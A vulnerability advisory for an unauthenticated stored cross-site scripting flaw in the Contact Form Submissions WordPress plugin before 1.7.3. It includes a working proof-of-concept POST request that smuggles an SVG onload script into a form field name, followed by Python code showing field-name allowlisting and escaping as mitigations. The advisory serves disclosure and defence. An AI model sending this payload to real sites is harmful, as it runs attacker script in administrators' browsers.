wpexploit | Yoru Oni | WPEX-ID:D02CF542-2D75-46BC-A0DF-67BBE501CC89
Feb 21, 2022 - 12:00 a.m.

Contact Form Submissions < 1.7.3 - Unauthenticated Stored XSS

EPSS: 0.001 (Low), percentile 31.6%

The plugin does not sanitise and escape additional fields in contact form requests before outputting them in the related submission. As a result, an unauthenticated attacker could perform Cross-Site Scripting attacks against admins viewing the malicious submission.

POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470
X-Requested-With: XMLHttpRequest
Content-Length: 726
Connection: close

-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-name"

Attacker
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-email"

[email protected]
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-subject"

XSS Injection
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-message"

Sorry, not sorry.
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="<svg/onload=(alert)(/XSS/)>"

Injected
-----------------------------243715402120191890871051639470--

The XSS will be triggered when an admin views the related submission.
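The two controls the description says are missing, shown as an added example that is not the plugin's code: flagging field names the form never defined before they are stored, and escaping both the field name and the value when the submission is rendered. The `FORM_FIELDS` allowlist, the helper names and the sample body (rebuilt from the request above with a shortened boundary and without the e-mail field) are constructed for illustration.

```python
import html
import re

BOUNDARY = "constructed-boundary"
# Constructed sample: fields taken from the request shown above.
SAMPLE_FIELDS = [
    ("your-name", "Attacker"),
    ("your-subject", "XSS Injection"),
    ("your-message", "Sorry, not sorry."),
    ("<svg/onload=(alert)(/XSS/)>", "Injected"),
]
# Assumption: the field names defined in the form being submitted.
FORM_FIELDS = {"your-name", "your-email", "your-subject", "your-message"}


def build_body(fields, boundary=BOUNDARY):
    """Serialise (name, value) pairs as a multipart/form-data body."""
    parts = [
        f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
        for n, v in fields
    ]
    return ("".join(parts) + f"--{boundary}--\r\n").encode()


def parse_fields(body, boundary=BOUNDARY):
    """Return the (name, value) pairs of a multipart/form-data body."""
    fields = []
    for part in body.split(b"--" + boundary.encode())[1:]:
        if part.startswith(b"--"):  # closing delimiter reached
            break
        head, _, value = part.strip(b"\r\n").partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', head)
        if match:
            fields.append((match.group(1).decode(), value.decode()))
    return fields


def unexpected_fields(fields, allowed=FORM_FIELDS):
    """Names the form never defined: drop or log these before storing."""
    return [name for name, _ in fields if name not in allowed]


def render_rows(fields):
    """Escape both the field name and the value before writing HTML."""
    return "".join(
        f"<tr><th>{html.escape(n)}</th><td>{html.escape(v)}</td></tr>"
        for n, v in fields
    )
```

Escaping only the values would not have helped here, because the markup travels in the field name.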
